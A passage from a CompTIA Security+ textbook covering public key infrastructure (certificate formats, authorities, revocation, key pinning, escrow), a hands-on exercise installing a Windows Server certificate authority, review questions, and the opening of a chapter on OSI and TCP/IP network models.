self-signed certificate issued by the (well-secured) root CA. A small organization might only need a
single CA that issues certificates directly to end users; a large tree maintained by a public CA
service could have several levels.
• In the bridge model, multiple root CAs can exist, each with their own tree; the difference is that the
root CAs each issue a certificate to the other. A certificate still must always trace back to its root
CA, but it can verify the other CA as well, linking the trees. Having multiple root CAs is convenient
in large or physically dispersed infrastructures.
• In the mesh model, CAs don't maintain a strict hierarchy, but instead issue cross-certificates to each
other. This can be a flexible model, but it's also easy to compromise.
• A hybrid model combines elements of the tree, bridge, and mesh models. As it sounds, this could
mean a lot of things. Hybrid models can make the actual trust relationship hard to keep track of.

CompTIA Security+ Exam SY0-501 145


Chapter 3: Cryptography / Module B: Public key infrastructure

Web of trust
The certificate is signed by one or more third parties to form a decentralized network of trust relationships: if
you trust any of the people who have signed the certificate, then you should be able to trust its owner. In other
words, it's much like a PKI mesh model, but based on end users rather than CAs. The Pretty Good Privacy
(PGP) system uses this model: any user can sign any other user's public key to build them into a web of trust,
which may be partially or fully meshed. Webs can be constructed quickly by using a key-signing party, a
physical or otherwise authenticated gathering where many people can exchange and verify public keys at
once. Revocation is a little more complicated in the web of trust model: a key's owner can revoke it, or
signatories can revoke their signatures.

Both the PKI and web of trust models rely on a certificate chain to verify the trust relationship between the
certificate you've just been given and one you already know you trust. For instance, your web browser came
with a set of root certificates for trusted CAs. When you visit a secure website, the browser verifies that the
site's certificate really is signed by the intermediate CA it claims to be issued by, then it verifies the signature
on the intermediate CA's certificate, and so on all the way back to the root CA.
This also means that in both models you still have some responsibility to be careful who you trust. After all,
an authenticated PKI certificate doesn't prove a website is trustworthy; it only proves that a CA you believed
was trustworthy issued it a certificate. It's most important in the web of trust model where the responsibilities
of trust are distributed between all users, but even in the PKI model CAs have been compromised, and
fraudulent signatures issued.

Certificate formats
The most popular standard for certificates is X.509, originally defined by the ITU-T in 1988. The standard
technically can be used in a web of trust model, but it's almost always used as part of a strict hierarchical
model. In fact, X.509 is almost synonymous with the IETF PKI standard. X.509 is the standard typically used
by web browsers and many other transport encryption protocols.

Exam Objective: CompTIA SY0-501 6.4.1.9, 6.2.3.5


An X.509 certificate itself can exist in different file formats and data encoding styles, but all of those formats
use the same underlying data structure, Abstract Syntax Notation One (ASN.1). They also all contain the same
types of information. A number of standard fields are included in all certificates, but the current X.509 version
3 standard also allows custom fields, or extensions, which allow certificates to be customized to special
purposes for whatever applications or protocols use them.

146 CompTIA Security+ Exam SY0-501


Chapter 3: Cryptography / Module B: Public key infrastructure

A website's certificate details, viewed in Firefox

Sections in a typical certificate can include:

Version The certificate's X.509 version. Version 3 is the current standard.


Serial number Unique to each certificate generated by a given CA.
Issuer The name of the certificate's creator. Unless it's a self-signed certificate, the issuer will be a
CA.
Subject The name of the certificate's subject or owner, formatted as a distinguished name (DN)
according to X.509 specifications. The DN can be the name of a user, a system, or a website.
A single certificate can use extensions to specify multiple subjects, for example different host
names within a domain.
Validity Starting and ending dates for the certificate's validity. As of 2015, certificates are usually
valid for no more than two or three years depending on type, but this is an industry standard
rather than a technical limitation.
Public Key The subject's public key, as well as the algorithm used to generate it.
Signature The issuer's digital signature, as well as the hashing and encryption algorithms used to
generate it.
Extensions Additional information included by the certificate issuer, such as additional subject names or
restrictions on usage. Every extension type has its own unique object identifier (OID). OIDs
are managed by ITU/ISO and assigned to other organizations in a hierarchical format. You
can easily recognize them by their dot-separated integer format, such as
1.3.6.1.5.5.7.3.1.
Note: You usually don't have to know how to read extensions, since they're information for
use by programs such as web browsers. One important point is that an extension can be
marked as critical or non-critical. If an application doesn't recognize a critical extension, it
must reject the certificate.

CompTIA Security+ Exam SY0-501 147


Chapter 3: Cryptography / Module B: Public key infrastructure

Another certificate format, OpenPGP, is most popular with web of trust systems. It's commonly used for
encrypting email, file, or partitions. Supporting applications include the original PGP, now owned by
Symantec, as well as a number of compatible alternatives such as the open source GNU Privacy Guard
(GPG). While the format is different, OpenPGP signatures contain the same general types of information. The
biggest difference is that there's no expectation that the key be issued and signed by a hierarchical authority.
In the end, the format of a certificate only really affects what kind of software it's compatible with. The
security it offers only as good as the trustworthiness of its signature, the reliability of the trust model backing
it, and the strength of the cryptographic algorithms used to create it.

Certificate encodings
An X.509 certificate can be encoded into any of several file formats. For the most part they hold the same
information, and you can convert a certificate between them, but you must use the right format for a given
application. Some file formats are meant for transmitting certificates, while others can also be used for
archiving private keys.

Exam Objective: CompTIA SY0-501 6.4.4

DER Distinguished Encoding Rules is a binary format, which may be stored with a .der file extension.
PEM Privacy Enhanced Email is an ASCII-encoded format, which means it can be transmitted directly
through email or other formats requiring ASCII encoding. It usually has a .PEM file format. CAs
usually issue certificates in PEM format.
CER A file extension for individual certificates used by Apache and other web servers. Internally it may
use DER or PEM encoding. Microsoft servers use the equivalent .crt file extension.
P12 Personal Information Exchange is a format conforming to RSA's Public Key Cryptography
Standard #12 (PKCS #12). Like a .pfx file, it is an archive file that can contain several cryptography
objects, such as certificates, private keys, and CRLs.
PFX PFX was the predecessor of PKCS #12 and supports the same basic functions. Windows commonly
uses PKCS #12 files with a .pfx extension to store private keys and other information.
P7B Cryptographic Message Syntax Standard is PCKS #7. It's also an archive format which can contain
certificates, chain certificates, and CRLs. It cannot contain a private key.

Certificate authorities
In the PKI model, assignment and revocation of certificates lies solely with CAs. In theory, a CA can sign or
revoke certificates however it sees fit, but a CA that wants to be trusted will operate according to clear and
well-formulated policies. Especially in the case of large public CAs, these policies will be determined not
only by good security practice but by local laws, industry regulations, and market preferences. A trustworthy
CAs maintains a public Certificate Practice Statement (CPS) detailing its policies.
The CPS should describe how certificates are issued by the CA, what measures are taken to protect them,
what users must do to maintain certificate eligibility, and how they will be revoked if necessary. It's not only
important that the CPS is available to certificate holders; it must also be available to those who want to
validate signatures and need to know if the CA can be trusted.
From the end user's perspective, the ultimate underpinning of PKI's security is both making sure that the CAs
themselves are trustworthy, and that all root certificates corresponding to root CAs are authentic. While the
CPS takes care of the former, the latter is one thing that has to happen through some out of channel method.
The root certificates for major public CAs are commonly distributed with software; for example, if you install
a web browser or even an operating system it will include a number of trusted root certificates by default. If
you want to install others, for example for a company CA, you'll need to make sure that they're securely
distributed to all systems that need them.

148 CompTIA Security+ Exam SY0-501


Chapter 3: Cryptography / Module B: Public key infrastructure

Certificate generation
At the most basic level, every certificate is generated the same way: the owner generates a public/private key
pair using an asymmetric algorithm, and the public key is then placed into a signed certificate. The details
depend entirely on the type of key.

Exam Objective: CompTIA SY0-501 6.4.1.5, 6.4.2.1, 6.4.3.8


Every PKI structure begins with the generation of a root key. Since it's so critical, root key generation happens
in carefully isolated environments under strong security precautions. For large or high-value CAs, this process
can be an elaborate ceremony involving a number of strictly-vetted witnesses and authorities, generating
rigorous documentation both that the public key is genuine and the private key is secret. Once the keys are
generated and used to self-sign a long-term root certificate, the private key is stored on a hardware security
module, in a cage, in a vault, under constant guard and surveillance; it is only ever accessed when it is needed
to sign a certificate for an intermediate CA.

Note: This approach is called an offline root CA, contrasted with the online intermediate CA it generates
certificates for. Any validation that can't be handled by intermediate CAs must be delegated to an
assigned validation authority which can validate certificates but can't issue any itself.
Subsequent certificates aren't generated under that level of scrutiny, but there's generally some level of formal
process involved and credentials that need to be validated, especially when the a certificate is issued to a
subordinate CA. For an end user, especially if the certificate is fairly limited in application, application might
not be a very rigorous process.

1. The applicant generates a key pair, and keeps the private key secret.
2. The applicant presents the public key to the CA, along with a document called a certificate signing
request (CSR). The CSR is formatted in similar notation to the certificate itself, and includes all
identifying organization. Depending on security level, the application might be over a secure channel, or
might be a physical meeting.
3. The CA verifies the applicant's identity according to its CPS. This might involve checking credentials,
contacting the applicant, or performing other investigation. The CA might delegate this part of the process
to a registration authority (RA)
4. The CA signs the certificate and disseminates it to the applicant and to the CA's repository sites.
When a certificate expires, the CA needs to renew it by issuing a new certificate. The process is the same as
assigning the original certificate, though the CA might have an easier validation process. Sometimes, a
renewal doesn't even require a new CSR.

CompTIA Security+ Exam SY0-501 149


Chapter 3: Cryptography / Module B: Public key infrastructure

Certificate types
A CA can issue a number of certificate types to serve different purposes. Each type can have its own
validation requirements, validity period, and in the case of a commercial CA, application cost. Some
certificate types include:

Exam Objective: CompTIA SY0-501 6.4.3.1, 6.4.3.2, 6.4.3.3, 6.4.3.5, 6.4.3.6, 6.4.3.7, 6.4.3.9, 6.4.3.10

Limited purpose The CA can specify what purposes a certificate should and should not be used for. For
example, certificates that can be used to sign contracts, make purchases, or sign code are
typically held to higher standards than those which cannot.
Email Usable for sending and receiving SMIME email messages; also known as SMIME
certificates. They are a common example of a limited certificate, and only require that
you prove you own the associated email address.
Code signing Used to sign an executable file to authenticate its source and guarantee its integrity.
Before installing an application or driver, an operating system can verify the signature to
make make sure the file hasn't been forged.
SAN A typical certificate identifies only a single entity, such as a person, business, or website
name. By using a Subject Alternative Name extension, a certificate can contain multiple
names, such as multiple website domain names run by a single organization, or both the
website and the organization itself. For example, www.javatucana.com and
corporate.javatucana.com could be covered by a single multi-domain certificate.
Wildcard A multi-domain certificate that can apply to any number of subdomains within a single
domain. For example, a wildcard certificate for *.javatucana.com would apply to any
hostname in the javatucana.com domain, even if it didn't yet exist when the certificate
was issued.
Extended A certificate backed by a stricter identity validation process than the CA's default. For
Validation (EV) SSL certificates used on the web, sites with a valid EV certificate show a distinct green
color in the browser's address bar. Generally, an EV certificate cannot also be a wildcard,
but it might be multi-domain.

Also important is the difference between user certificates which represent a specific user, and computer or
machine certificates that represent a computer. Machine certificates are used to identify servers or
authenticate client machines on the network, while user certificates are used for email authentication systems,
EFS file encryption, or other situations where a specific user must be identified.

Certificate revocation
If everything's going well, the application process makes sure a certificate doesn't go to the wrong people, the
cryptographic signatures make sure it can't be forged, and the validation period means it won't be around long
enough to likely be compromised. Since all of these can fail, it's essential that a CA be able to revoke a
certificate if necessary, and for anyone verifying a signature to make sure it hasn't been revoked.

Exam Objective: CompTIA SY0-501 2.3.5, 6.4.1.3, 6.4.1.4, 6.4.2.2


There are a number of reasons a CA can revoke a certificate. It could have been issued by mistake, or its
holder might have violated CA's policy requirements. More commonly, CAs revoke certificates whose private
keys have been compromised.
The X.509 standard specifies two revocation states:
 Revoked: The certificate is irreversibly invalidated, and a new one must be issued.
 Hold: The certificate is temporarily invalid, but can be reinstated or permanently revoked later. This is
used when a CA has doubts about a certificate but hasn't made a permanent decision.

150 CompTIA Security+ Exam SY0-501


Chapter 3: Cryptography / Module B: Public key infrastructure

Part of the duties of a CA is to maintain a list of all revoked certificates, and make sure that they're
communicated to all users in a timely manner. This can be done one of two ways.

Certificate A list containing the serial numbers of all revoked certificates, published regularly to a
Revocation List website so that users can download or consult it on demand. Like a certificate, the CRL is
(CRL) itself signed by the CA to authenticate it, and it has a validity period. CAs update their
CRLs to a location specified in the the CA's certificate, and might update daily or even
hourly.
Online Certificate A request/response protocol used over HTTP. A client uses OCSP to contact the CA
Status Protocol directly and ask about the revocation status of a particular certificate. Since an OCSP
(OCSP) request is much smaller than a full CRL, this can save significantly on network resources,
and since it doesn't rely on publication periods it can always be up to date. For these
reasons, OCSP is generally seen as a more flexible and modern alternative to CRL.

One drawback of OCSP is that the popularity of certificates means there are a lot of requests for OCSP status.
This increases traffic greatly to CAs, and also means clients often need to check with CAs. One way around
this is by OCSP stapling. In the stapling process, the server periodically verifies its own certificate status and
receives time-stamped response signed by the CA. When the server performs a TLS handshake with a client,
it presents its OCSP response along with its certificate. While this might sound a little insecure at first, it isn't:
since the response is time-stamped and signed directly by the CA, the client can trust that it is both recent and
genuine, just like if it had performed the OCSP response itself. The overall process is very much like a
Kerberos client presenting its ticket.
In theory, a subordinate CA's certificate can be revoked by its parent; in that case, all certificates the
subordinate CA had signed with that key would themselves be non-trusted. A root certificate can't be revoked:
it would need to be manually removed from certificate stores on each user system.
This happened in 2011 when DigiNotar, a CA which held root certificates both for commercial websites and
the Dutch government, was compromised and forced to issue hundreds of fraudulent keys. All major browsers
quickly issued updates to invalidate all potentially affected root certificates, so the damage was limited;
however, DigiNotar wasn't so lucky. The severity of the incident undermined public trust in the CA enough
that even its untouched keys were later invalidated. Within a month of the breach being reported, DigiNotar
itself was bankrupt and being liquidated—another lesson in how one security failure can destroy an entire
organization.

Key pinning
By now you might have the idea that PKI certificates are pretty secure. In fact, they do work pretty well but
there are still ways fraudulent certificates can be used to carry out man-in-the-middle attacks. One way
around this is key pinning, where a client can store copies (or hashes) of a known server certificate or public
key, then whenever it connects to that server it verifies that the server certificate is identical rather than a
fraudulent copy claiming to represent the same server name.

Exam Objective: CompTIA SY0-501 6.4.2.3


Key pinning is most useful for SSL/TLS applications that primarily connect to a short list of known servers,
as opposed to web browsers which might connect to any number of secure websites, but since web browsers
are one of the main targets of attackers it's a popular solution even there. Key pinning is supported by Chrome
and Firefox, using two methods.
 In static pinning, the browser's publisher pins keys of especially high-traffic sites such as Google or
Twitter in the browser installation itself.
 Dynamic pinning uses the IETF standard HTTP Public Key Pinning (HPKP). When a client first
contacts a server using HPKP, it pins the key to check against every subsequent time it contacts the
same server. That way, if it changes something is wrong.

CompTIA Security+ Exam SY0-501 151


Chapter 3: Cryptography / Module B: Public key infrastructure

Like any other security measure, key pinning isn't perfect, and sometimes can introduce problems of its own.
HPKP won't protect you if the first time you connect to a server you're connecting to a fraudulent one. In fact,
your browser will believe the fraudulent server to be real and the real one to be fraudulent. Both static and
dynamic methods have the problem that if a legitimate server has a certificate that expires, or which needs to
be reissued, it will no longer match the pinned key. With normal TLS this isn't a problem as long as the new
certificate is signed by a trusted CA, but against a pinned key it will fail validation.

Key archival and recovery


Much of the security of key pairs revolves around the fact that a private key never needs to leave the system
that generated it, and thus will never be exposed to an attacker during transmission. This raises security
questions when it comes to backing up systems or storage devices that contain private keys. Many systems
allow special rules to be applied to key archives during backup processes, and a CPS issued by a CA might
include guidelines about how private keys should or should not be stored.

Exam Objective: CompTIA SY0-501 1.6.16

 Private keys can be backed up along with the rest of a system. This is often simplest, but it means that
the entire backup needs to be treated as securely as the key itself would be.
 Alternatively, private keys can be left out of backups entirely—if they're lost, you simply apply for a
new certificate. This minimizes the chance of a key being stolen, but makes it easier for it to be lost
with other data.
 A compromise between the two is to back up key stores and their corresponding certificates separately
from other data. Typically, a key store backup is small and easy to protect with strong encryption or
other security measures.
 Dedicated hardware storage modules used to contain particularly valuable keys typically include their
own secure backup functions.

Which strategy to choose depends not only on the CPS, but on what the key is to be used for. If a key is used
for transport encryption, such as on a secure website with an SSL certificate, losing the key would mean an
inconvenient and perhaps expensive, reapplication process; on the other hand, the key being stolen could lead
to much greater damage. In that case, you might choose not to back up the key at all. On the other hand,
losing the only key that can decrypt an encrypted drive would mean losing all the data entirely, so some sort
of backup in that case is essential.
Keys can also be securely stored with an authorized third party in a key escrow process. Frequently the term
is specifically used for key storage required by an external authority which wants to guarantee access to the
protected data, such as a larger organization or government agency. Since transmitting and sharing a private
key always introduces vulnerabilities, mandatory key escrow is controversial even when the third party's
motivations aren't in question.
When keys are properly archived, it is difficult by design to retrieve them. Some systems use a key recovery
agent, a designated individual with the ability to restore lost keys using a key recovery certificate. Key escrow
can also be used for key recovery; for example, BitLocker drive encryption allows a recovery key to be stored
on a domain server or in a user's Microsoft account.

152 CompTIA Security+ Exam SY0-501


Chapter 3: Cryptography / Module B: Public key infrastructure

Exercise: Installing a certificate authority


In this exercise, you'll use the Windows Server 2012 VM to install a CA and prepare to issue certificates.
Do This How & Why

1. In Windows Server 2012, install the


Active Directory Certificate Services
role.

a) In Server Manager, click Manage > The Add Roles and Features Wizard window opens.
Add Roles and Features.

b) Click Next three times. Until you reach the Select server roles screen.

c) Check Active Directory


Certificate Services.

You're asked whether to add other required features.

d) Click Add Features. To close the pop-up window.

e) Click Next three times. Until you reach the Select role services screen.

f) Check all role services except Click Add Features when prompted.
Network Device Enrollment
Service.

g) Click Next three times, then click The process may take a few minutes.
Install.

h) Click Close. A warning flag appears in Server Manager, indicating that you
need to configure the CA.

2. Configure Active Directory Certificate


Services.

CompTIA Security+ Exam SY0-501 153


Chapter 3: Cryptography / Module B: Public key infrastructure

Do This How & Why

a) Click the warning flag. A Post-deployment Configuration warning pop-up appears.

b) Click Configure Active Directory The AD CS Configuration wizard opens.


Certificate Services on the
designated server.

c) Click Next. To install using Administrator's credentials. The Role Services


screen appears.

d) Check Certification Authority,


Certification Authority Web
Enrollment, and Online
Responder.

e) Click Next To move to the Setup Type screen.

f) Verify that Enterprise CA is Enterprise CAs work as part of Active Directory.


selected and click Next.

g) Verify that Root CA is selected and You're starting a whole new PKI infrastructure.
click Next.

3. Create a private key and root


certificate for the CA.

a) Verify that Create a new private If you were reinstalling a CA, you could use your existing
key is selected and click Next. private key. To move to the Cryptography screen.

b) From the hash algorithm list, click You'll keep the default setting of a 2048-bit RSA key, but
SHA256. SHA1 hashes are no longer recommended for digital
certificates.

c) Click Next. To view the CA name screen.

d) Edit the Common name field to


read mwha-CA and click Next.

154 CompTIA Security+ Exam SY0-501


Chapter 3: Cryptography / Module B: Public key infrastructure

Do This How & Why

e) Click Next twice. To accept the default validity period of five years, and the
default database location. Your final settings are displayed.

f) Click Configure, then Close. The configuration may take a minute to complete. You're
asked whether to configure additional role services.

4. Configure additional role services.

a) In the AD CS Configuration A new wizard opens.


window, click Yes.

b) Click Next. The Role Services window shows the roles you just installed
as automatically checked.

c) Check Certificate Enrollment The last two on the list.


Web Service and Certificate
Enrollment Policy Web Service,
then click Next.

d) Click Next. To accept the default CA and mote to the Authentication type
screen.

e) Verify that Windows integrated Now you need to specify a service account for CES.
authentication is selected and
click Next.

f) Click Select A login window appears.

g) Enter Administrator's credentials Username: Administrator, Password: P@ssw0rd (or


and click OK. whatever you've changed it to).
Note: In real life you'd give the CA its own
account and password for more security.

h) Click Next.

CompTIA Security+ Exam SY0-501 155


Chapter 3: Cryptography / Module B: Public key infrastructure

Do This How & Why

i) Verify that Windows integrated Now you need to select a server certificate.
authentication is selected and
click Next.

j) In the Certificate list, click mwha- If any other certificates are there, ignore them.
CA, then click Next.

k) On the Confirmation screen, click


Configure, then Close.

5. Manage certificate templates.

a) In Server Manager, click Tools > The Certification Authority console opens.
Certification Authority.

b) In the left pane, expand mwha-ca.

c) Right-click Certificate Templates The Certificate Templates Console window opens.


and click Manage.

d) Scroll through the list of templates. You can create templates for users, computers, multiple server
types, and assorted network protocols. Some have an intended
purpose listed.

6. Configure a new template.

156 CompTIA Security+ Exam SY0-501


Chapter 3: Cryptography / Module B: Public key infrastructure

Do This How & Why

a) Right-click User and click Near the end of the list. A Properties window appears.
Duplicate Template.

b) On the General tab, change the The Template name is automatically changed to match.
Template display name to
Employees.

c) On the Request handling tab, select


Encryption from the Purpose list.

Click Yes in the confirmation window.

d) Check Archive subject's Click OK in the warning window if prompted.


encryption private key.

e) Examine the other tabs in the You won't change any other properties.
window.

f) Click OK. The new template is added to the list.

g) Close the Certificate Templates The Certification Authority console is still open.
Console.

7. Enable the Employees template on the


server.

CompTIA Security+ Exam SY0-501 157


Chapter 3: Cryptography / Module B: Public key infrastructure

Do This How & Why

a) Right-click Certificate Templates The Enable Certificate Templates window appears.


and click New > Certificate Employees is in the list.
Template to Issue.

b) Select Employees and click OK.

c) Click the Certificate Templates Employees is in the list. Now users can request certificates
folder. based on the template.

8. Close the Certification Authority


console.

The CA Authority window at the end of the exercise.

Assessment: Public key infrastructure


1. What is true of a digital certificate, but not true of a digital signature? Choose all that apply.
 Has a valid starting and ending date
 Proves the authenticity of a message
 Proves the authenticity of a person or system
 Provides non-repudiation

158 CompTIA Security+ Exam SY0-501


Chapter 3: Cryptography / Module B: Public key infrastructure

2. What defines an EV certificate? Choose the best response.


 It applies to more than one domain
 It lasts longer than a normal certificate
 It requires a stricter identity verification process on application
 It uses stronger cryptography

3. What's generally seen as the most modern and flexible way to find out if a certificate has been revoked?
 ASN.1
 CRL
 CSR
 OCSP

4. Your employer demands a copy of all private keys used on devices you use for work, since regulatory
requirements require them to be able to decrypt any official communications when legally requested.
What is this an example of?
 Key escrow
 Key recovery
 PKI hierarchy
 Revocation

5. What certificate formats commonly use the web of trust model? Choose the best response.
 ASN.1
 Bridge
 OpenPGP
 X.509

6. What certificate encoding is intended for use in secure email? Choose the best response.
 CER
 DER
 PEM
 PFX

7. An attacker's gotten a fraudulent certificate attesting to be for your bank and is planning to intercept your
transactions in a man-in-the-middle attack. The certificate hasn't been revoked yet, but what technology
could still let you know something is wrong?
 Escrow
 Pinning
 OCSP
 Stapling

CompTIA Security+ Exam SY0-501 159


Chapter 3: Cryptography / Summary: Cryptography

Summary: Cryptography
You should now know:
 About the primary branches of modern cryptography, including symmetric and asymmetric ciphers,
hashes, and steganography. You should also know how the different types are used together for tasks
one couldn't perform alone, such as for key exchange and digital signatures.
 How digital certificates are created, used, and revoked as part of a PKI structure.

160 CompTIA Security+ Exam SY0-501


Chapter 4: Network fundamentals
You will learn:
 About network components
 About IP addresses
 About network ports and applications

CompTIA Security+ Exam SY0-501 161


Chapter 4: Network fundamentals / Module A: Network components

Module A: Network components


Networks are a key part of any security strategy. Not only are they the chief vector for many attacks, but data
is often the most valuable when it's in transit. The increasing importance of networks for almost any
organization has its own repercussions: not only does it get harder just not to connect vulnerable devices, but
disrupting network functions is itself the goal of many attackers.
The Security+ exam doesn't focus on the details of installing and maintaining networks themselves—that's
Network+, which is its own book. But it does assume that students have a working knowledge of network
functions and protocols as the underlying context of network-based threats and security controls, so it's a good
idea to refresh yourself on those functions and the devices which perform them.
You will learn:
 About the OSI and TCP/IP models
 About Data Link layer technologies and devices
 About Network layer protocols and devices
 About non-IP networks and network convergence

Network models
Networks are created from many interrelated parts created by different vendors in order to serve different
functions, so it's important that network engineers have the ability to describe how these parts work together.
This isn't just important for troubleshooting problems with existing networks: it's also important for
understanding what functions and responsibilities each component has. This way, if you want to replace or
upgrade one element of the network you won't introduce compatibility problems, and if you want to add new
functionality you can guess the best place to fit it into existing networks. This sort of problem is common in
technology fields, and the frequent solution is reference models using abstraction layers to separate what part
of the system any particular piece of hardware, software, or other element occupies.
There are two primary reference models used to describe networks. Both were invented at roughly the same
time, but by different people designing different networks. Consequently, while the two have a lot of
similarities, and both are used in reference to the same networks today, the two are also very different.

OSI (Open Systems Designed beginning in 1977 by the ISO, with the intention to design a suite of network
Interconnect) protocols that would become the world's primary network standards. This didn't really
happen, and while some OSI protocols became important, most were never widely
used. On the other hand, the model itself found a very important place as an educational
tool and theoretical reference for the development of network technologies. Since it's
very good even at explaining systems designed under different models, network
technicians are well-versed in the OSI model and use it in their daily work.
TCP/IP (Internet Developed from the 1960s by the 1980s by the US Department of Defense and today
Protocol Suite) maintained by the IETF, TCP/IP is named for two of its most important protocols,
Transmission Control Protocol (TCP) and Internet Protocol (IP). This naming actually
says a lot about the difference between the two: TCP/IP was originally developed to
solve a practical set of networking problems for the US military, so its creators
designed the protocols and the descriptive model side by side. While the core protocols
of TCP/IP became the dominant standards of the internet and today's other networks,
the model itself is less comprehensive. In fact, since it's protocol-dependent you could
even call it a network standard or implementation rather than a network model.

162 CompTIA Security+ Exam SY0-501


Chapter 4: Network fundamentals / Module A: Network components

Remember that both of those models were designed decades ago, when networks behaved much differently
than they do today. While some device types and protocols from those days are still in common use and fit
neatly into the original models, modern developments have blurred the lines in a lot of cases. Security
technologies are no exception.

The OSI model


The OSI model is made up of seven layers, arranged vertically in what is called a stack. They're numbered
from the bottom up. Ideally a given communications protocol or network appliance can be described by the
layer it occupies, though in practice a real world example might span multiple adjacent layers.

Layer 1: Transmission and reception of data in a raw bit stream across physical media, including
Physical character encoding and decoding. Layer 1 protocols interface directly with the hardware of
the connection so are generally tied to a specific medium and speed standard, such as the
1000BASE-T used by Gigabit Ethernet, or 802.11n Wi-Fi. Layer 1 devices on the network
include hubs, wireless access points, or the lower-level components of a NIC.
Layer 2: Data Translates physical layer bits to and from ordered packets called frames, and transfers them
Link between nodes on the same network. Layer 2 protocols include Ethernet, 802.11, and Frame
Relay. Layer 2 devices include bridges, simple switches, and the upper level functions of a
NIC.
Layer 3: Creates paths through the logical network for the transmission of data. This includes
Network managing logical network addresses, routing data across interconnected networks, and
improving network reliability through error and congestion control. Layer 3 protocols
include IPv4, IPv6, IPX, and MPLS. Layer 3 devices include more complex switches and
routers.

CompTIA Security+ Exam SY0-501 163


Chapter 4: Network fundamentals / Module A: Network components

Layer 4: Delivers data from host to host along the paths created by the network layer. The transport
Transport layer also translates between network packets and the data used by applications; in general, it
can be seen as the interface between a computer and the network. Layer 4 protocols include
TCP, UDP, and SPX. Intelligent switches and gateways might incorporate functions of layers
4 and higher to help shape network traffic.
Layer 5: Establishes sessions, or defined conversations, between applications on different hosts.
Session Sessions must be created, maintained separately from other sessions, and ended. Layer 5
protocols include NetBIOS, NFS, and the sockets used by TCP and UDP.
Layer 6: Controls the formatting and security of data. Sometimes called the syntax layer. Layer 6
Presentation protocols include network encryption protocols like TLS and SSL, or formatting methods
like MIME. They also include data formats you might not normally think of in network
terms, like ASCII, XML, or MPEG.
Layer 7: Provides services used by host applications. Layer 7 protocols include HTTP, FTP, telnet,
Application and email. The application layer is not the same as the applications themselves: your web
browser is not part of layer 7, it just communicates with the network through the HTTP
protocol.

You might hear network cables themselves discussed as "Layer 0" of the stack, but important as they are
they're not formally a part of the OSI model. Likewise, network technicians and security experts may
informally call users and organizations "Layer 8" to describe the human factor of network functions.
Communications between network devices and services need to pass down through the stack on the source
node, then back up on the destination node. Usually this means that data from a higher level protocol must be
encapsulated in a lower level protocol. For example, when your web browser sends a request to a web server
on the same local network, both are using the Layer 7 HTTP protocol. To reach the server the data must be
formatted by the Presentation layer, directed to a Session layer socket, and encapsulated in a TCP segment.
The segment then is placed in an IP packet, which is placed in an Ethernet frame, which is transmitted bit-by-
bit at 1000BASE-T. Once the data reaches the server, the whole process is reversed, and the data is handed off
to the web server itself.

The TCP/IP model


The TCP/IP model consists of a stack of four vertical layers. Each roughly corresponds to one or more OSI
layers and performs most of the same functions, though the boundaries between them can be somewhat
different.

164 CompTIA Security+ Exam SY0-501


Chapter 4: Network fundamentals / Module A: Network components

Network Interface Also known as the Network Access Layer or Link Layer, this defines how nodes
communicate on local network and adapter level; corresponds to OSI Layers 1 and 2.
Network Interface protocols can include Ethernet and Wi-Fi used in LANs, or ATM
and Frame Relay used in WANs.
Internet Controls the routing of packets across multiple logical networks; corresponds to OSI
Layer 3. The core protocol of this layer is IP itself, which carries most network data.
The Internet Layer also includes control protocols used to maintain network function,
such as ICMP.
Transport Manages end-to-end communication between hosts, and breaks application data up into
the segments or datagrams sent over the network; corresponds to OSI Layer 4. The
primary protocols on this level are TCP and UDP. Both carry network data, but TCP is
designed to establish stable and reliable connections while UDP is designed for
communications where speed and resource overhead are more important than
reliability.
Application Allows user level applications to access the other layers; corresponds to OSI Layers 5-
7. Each type of network application has its own application protocol type, and more are
being continually added. Familiar ones include web protocols like HTTP, file transfer
protocols like FTP, and email protocols like SMTP, POP, and IMAP. Other Application
layer protocols are associated with network services, like DNS, SNMP, and RIP.

As you might have noticed, TCP/IP accepts a great number of protocols at its lowest and highest layers where
it has to interface with network hardware and host applications. By contrast, the Internet and Transport layer
consist of a small number of tightly integrated protocols used by almost everything on the internet.
TCP/IP also defines communications differently than OSI. Instead of theoretical relationships between layers,
TCP/IP relies on concrete relations between protocols. It also assumes that protocols can be designed to rely
on other protocols within their same layer.
Finally, and most importantly for security, TCP/IP protocols were designed according to the robustness
principle, first stated in an early TCP specification document as "TCP implementations should follow a
general principle of robustness: be conservative in what you do, be liberal in what you accept from others."
What this means is that TCP/IP protocols are expected to send data that conforms strictly to protocol
standards, but attempt to decipher and accept non-standard but intelligible data they receive from other
protocols.
The robustness principle is another example of how what's good for basic functionality can be bad for other
parts of security. While it's great for designing networks that function well regardless of shoddy
implementations or configuration errors, it allows attackers to send deliberately non-standard data that will
trick a receiving system into doing unsafe things. This hasn't caused the robustness principle to go away, but
all the same newer protocols tend to be less trusting than older ones.

CompTIA Security+ Exam SY0-501 165


Chapter 4: Network fundamentals / Module A: Network components

Discussion: Network models


1. What are the biggest differences between the TCP/IP and OSI models?
Answers may include that the TCP/IP model has fewer layers, that its protocols are in wider use, that it is
less suited for discussion of generalized network topics, or that it is technically a network standard or
implementation rather than a model.
2. If the OSI protocols aren't in current use, why is the reference model so important?
The OSI model clearly explains the general process of networking, and it's widely used in explaining how
actual networks and protocols fit together.
3. What is the robustness principle, and how does it affect security?
The idea that a given protocol should adhere strictly to the official standard when it sends data, but that
when it receives data it should be forgiving of slightly non-standard formats as long as the meaning is
clear. Many TCP/IP attacks are designed to exploit the robustness principle by deliberately misusing
protocols on the assumption that the receiving system will try to process them anyway only to encounter
errors the attacker can exploit.

The Data Link layer


It's not fair to say that the Physical Layer of the OSI model is the simplest: to the contrary, since it has to work
on such a wide range of physical hardware and manage the intricacies of encoding binary data into physical
signals, it can be very complex. On the other hand, layer 1 devices usually shovel data blindly along while
trusting higher level protocols to know where it's going and what it's doing, and physical technologies are
usually closely tied to the Layer 2 protocols in use.
By contrast, the Data Link layer is home to a number of functions, protocols, and technologies that can be
used to create a functioning network with addresses, traffic direction, and security controls. Layer 2 devices
need to be more "intelligent" than their Layer 1 counterparts, with processing and storage capacity not only
distinguish the bits and symbols that pass through them, but to interpret some of their contents. This means
they can be more easily exploited by attacks, and also that they can perform more useful security functions.
Some of the more important Data Link layer concepts that have important security ramifications include:
 MAC addresses
 Switches
 Collision and broadcast domains
 VLANs
 Wireless access points

MAC addresses
Layer 1 devices just push data indiscriminately through the network, but higher layers have to make sure to
make sure data reaches the right place. On Layer 2, this is done via MAC addresses, originally developed for
Ethernet but widely adopted by other L2 standards like Wi-Fi. MAC addresses get their name from the Media
